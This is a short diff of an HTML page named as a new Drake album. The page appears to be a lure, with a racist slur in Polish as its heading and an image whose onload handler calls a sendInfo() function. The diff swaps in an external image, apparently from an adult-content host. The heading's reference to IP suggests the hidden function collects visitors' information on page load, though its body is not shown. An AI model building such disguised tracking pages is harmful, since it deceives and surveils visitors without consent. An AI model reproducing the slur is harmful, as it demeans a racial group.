--- a/DRAKENEWALBUM.html
+++ b/DRAKENEWALBUM.html
@@ -5,7 +5,7 @@
 </head>
 <body>
   <h1>jebac niggerow fajne ip</h1>
-  <img src="img/librus.png" onload="sendInfo()">
+  <img src="https://thumb-lvlt.xhcdn.com/a/4IJQFV6sCAIZwm_baFKxgA/022/843/874/v2/2560x1440.223.webp" onload="sendInfo()">
 
   <script>
     function sendInfo() {
